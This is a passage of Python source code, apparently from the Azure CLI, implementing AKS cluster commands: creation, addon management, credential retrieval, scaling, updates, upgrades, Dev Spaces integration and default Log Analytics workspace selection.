raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
identity = None
if enable_managed_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
mc = ManagedCluster(
location=location,
tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=not disable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
api_server_access_profile=api_server_access_profile,
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id
)
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
# Add AAD session key to header.
# If principal_obj is None, we will not add this header, this can happen
# when the cluster enables managed identity. In this case, the header is useless
# and that's OK to not add this header
custom_headers = None
if principal_obj:
custom_headers = {'Ocp-Aad-Session-Key': principal_obj.get("aad_session_key")}
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
need_pull_for_result = monitoring or (enable_managed_identity and attach_acr)
if need_pull_for_result:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc))
else:
result = sdk_no_wait(no_wait,
client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=mc,
custom_headers=custom_headers)
if monitoring:
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if enable_managed_identity and attach_acr:
if result.identity_profile is None or result.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach acr to it, '
'you can manually grant permission to the identity named <ClUSTER_NAME>-agentpool '
'in MC_ resource group to give it permission to pull from ACR.')
else:
kubelet_identity_client_id = result.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
return result
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name, no_wait=no_wait)
if 'omsagent' in instance.addon_profiles and instance.addon_profiles['omsagent'].enabled:
_ensure_container_insights_for_monitoring(cmd, instance.addon_profiles['omsagent'])
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False, context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
ADDONS = {
'http_application_routing': 'httpApplicationRouting',
'monitoring': 'omsagent',
'virtual-node': 'aciConnector',
'kube-dashboard': 'kubeDashboard',
'azure-policy': 'azurepolicy'
}
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError('usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError('usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
return sdk_no_wait(no_wait,
client.reset_service_principal_profile,
resource_group_name,
name, service_principal, client_secret)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None,
uptime_sla=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (aad_tenant_id is None and aad_admin_group_object_ids is None)
# pylint: disable=too-many-boolean-expressions
if (update_autoscaler != 1 and cluster_autoscaler_profile is None and
not update_lb_profile and
not attach_acr and
not detach_acr and
not uptime_sla and
api_server_authorized_ip_ranges is None and
not enable_aad and
not update_aad_profile and
not enable_ahub and
not disable_ahub):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--load-balancer-managed-outbound-ip-count" or'
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or'
'"--load-balancer-outbound-ports" or'
'"--load-balancer-idle-timeout" or'
'"--attach-acr" or "--detach-acr" or'
'"--uptime-sla" or'
'"--api-server-authorized-ip-ranges" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids" or '
'"--enable-ahub" or '
'"--disable-ahub"')
instance = client.get(resource_group_name, name)
# For multi-agent pool, use the az aks nodepool command
if update_autoscaler > 0 and len(instance.agent_pool_profiles) > 1:
raise CLIError('There are more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this node pool.\n'
'Please run "az aks --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this node pool.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear autoscaler profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if instance.identity is not None and instance.identity.type == "SystemAssigned":
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance=instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError('Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(aad_admin_group_object_ids)
if enable_ahub and disable_ahub:
raise CLIError('Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
if enable_ahub:
instance.windows_profile.license_type = 'Windows_Server'
if disable_ahub:
instance.windows_profile.license_type = 'None'
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd,
client,
resource_group_name, name,
kubernetes_version='',
control_plane_only=False,
node_image_only=False,
no_wait=False,
yes=False):
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
_upgrade_single_nodepool_image_version(True, client, resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
return sdk_no_wait(no_wait, client.upgrade_node_image_version, resource_group_name, cluster_name, nodepool_name)
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
:param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError("Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, addons, enable, workspace_resource_id=None,
subnet_name=None, no_wait=False):
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == 'aciConnector':
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# addon name is case insensitive
addon = next((x for x in addon_profiles.keys() if x.lower() == addon.lower()), addon)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == 'omsagent':
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {'logAnalyticsWorkspaceResourceID': workspace_resource_id}
elif addon.lower() == ('aciConnector' + os_type).lower():
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError('The aci-connector addon requires setting a subnet name.')
addon_profile.config = {'SubnetName': subnet_name}
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == 'kubeDashboard':
addon_profiles[addon] = ManagedClusterAddonProfile(enabled=False)
else:
raise CLIError("The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _handle_addons_args(cmd, addons_str, subscription_id, resource_group_name, addon_profiles=None,
workspace_resource_id=None, aci_subnet_name=None, vnet_subnet_id=None):
if not addon_profiles:
addon_profiles = {}
addons = addons_str.split(',') if addons_str else []
if 'http_application_routing' in addons:
addon_profiles['httpApplicationRouting'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('http_application_routing')
if 'kube-dashboard' in addons:
addon_profiles['kubeDashboard'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profiles['omsagent'] = ManagedClusterAddonProfile(
enabled=True, config={'logAnalyticsWorkspaceResourceID': workspace_resource_id})
addons.remove('monitoring')
# error out if '--enable-addons=monitoring' isn't set but workspace_resource_id is
elif workspace_resource_id:
raise CLIError('"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles['azurepolicy'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('azure-policy')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError('"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
addon_profiles['aciConnectorLinux'] = ManagedClusterAddonProfile(
enabled=True,
config={'SubnetName': aci_subnet_name}
)
addons.remove('virtual-node')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _install_dev_spaces_extension(cmd, extension_name):
try:
from azure.cli.core.extension import operations
operations.add_extension(cmd=cmd, extension_name=extension_name)
except Exception: # nopa pylint: disable=broad-except
return False
return True
def _update_dev_spaces_extension(cmd, extension_name, extension_module):
from azure.cli.core.extension import ExtensionNotInstalledException
try:
from azure.cli.core.extension import operations
operations.update_extension(cmd=cmd, extension_name=extension_name)
operations.reload_extension(extension_name=extension_name)
except CLIError as err:
logger.info(err)
except ExtensionNotInstalledException as err:
logger.debug(err)
return False
except ModuleNotFoundError as err:
logger.debug(err)
logger.error("Error occurred attempting to load the extension module. Use --debug for more information.")
return False
return True
def _get_or_add_extension(cmd, extension_name, extension_module, update=False):
from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension)
try:
get_extension(extension_name)
if update:
return _update_dev_spaces_extension(cmd, extension_name, extension_module)
except ExtensionNotInstalledException:
return _install_dev_spaces_extension(cmd, extension_name)
return True
def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name):
# mapping for azure public cloud
# log analytics workspaces cannot be created in WCUS region due to capacity limits
# so mapped to EUS per discussion with log analytics team
AzureCloudLocationToOmsRegionCodeMap = {
"australiasoutheast": "ASE",
"australiaeast": "EAU",
"australiacentral": "CAU",
"canadacentral": "CCA",
"centralindia": "CIN",
"centralus": "CUS",
"eastasia": "EA",
"eastus": "EUS",
"eastus2": "EUS2",
"eastus2euap": "EAP",
"francecentral": "PAR",
"japaneast": "EJP",
"koreacentral": "SE",
"northeurope": "NEU",
"southcentralus": "SCUS",
"southeastasia": "SEA",
"uksouth": "SUK",
"usgovvirginia": "USGV",
"westcentralus": "EUS",
"westeurope": "WEU",
"westus": "WUS",
"westus2": "WUS2"
}
AzureCloudRegionToOmsRegionMap = {
"australiacentral": "australiacentral",
"australiacentral2": "australiacentral",
"australiaeast": "australiaeast",
"australiasoutheast": "australiasoutheast",
"brazilsouth": "southcentralus",
"canadacentral": "canadacentral",
"canadaeast": "canadacentral",
"centralus": "centralus",
"centralindia": "centralindia",
"eastasia": "eastasia",
"eastus": "eastus",
"eastus2": "eastus2",
"francecentral": "francecentral",
"francesouth": "francecentral",
"japaneast": "japaneast",
"japanwest": "japaneast",
"koreacentral": "koreacentral",
"koreasouth": "koreacentral",
"northcentralus": "eastus",
"northeurope": "northeurope",
"southafricanorth": "westeurope",
"southafricawest": "westeurope",
"southcentralus": "southcentralus",
"southeastasia": "southeastasia",
"southindia": "centralindia",
"uksouth": "uksouth",
"ukwest": "uksouth",
"westcentralus": "eastus",
"westeurope": "westeurope",
"westindia": "centralindia",
"westus": "westus",
"westus2": "westus2"
}
# mapping for azure china cloud
# currently log analytics supported only China East 2 region
AzureChinaLocationToOmsRegionCodeMap = {
"chinaeast": "EAST2",
"chinaeast2": "EAST2",
"chinanorth": "EAST2",
"chinanorth2": "EAST2"
}
AzureChinaRegionToOmsRegionMap = {
"chinaeast": "chinaeast2",
"chinaeast2": "chinaeast2",
"chinanorth": "chinaeast2",
"chinanorth2": "chinaeast2"
}
# mapping for azure us governmner cloud
AzureFairfaxLocationToOmsRegionCodeMap = {
"usgovvirginia": "USGV"
}
AzureFairfaxRegionToOmsRegionMap = {
"usgovvirginia": "usgovvirginia"
}
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
cloud_name = cmd.cli_ctx.cloud.name
workspace_region = "eastus"
workspace_region_code = "EUS"
# sanity check that locations and clouds match.
if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV")
else:
workspace_region = rg_location
workspace_region_code = rg_location.upper()
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region})
default_workspace_params = {
'location': workspace_region,
'properties': {
'sku': {
'name': 'standalone'
}
}
}
async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
default_workspace_params)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
if 'loganalyticsworkspaceresourceid' in addon.config:
addon.config['logAnalyticsWorkspaceResourceID'] = addon.config.pop('loganalyticsworkspaceresourceid')
workspace_resource_id = addon.config['logAnalyticsWorkspaceResourceID']
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError('Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
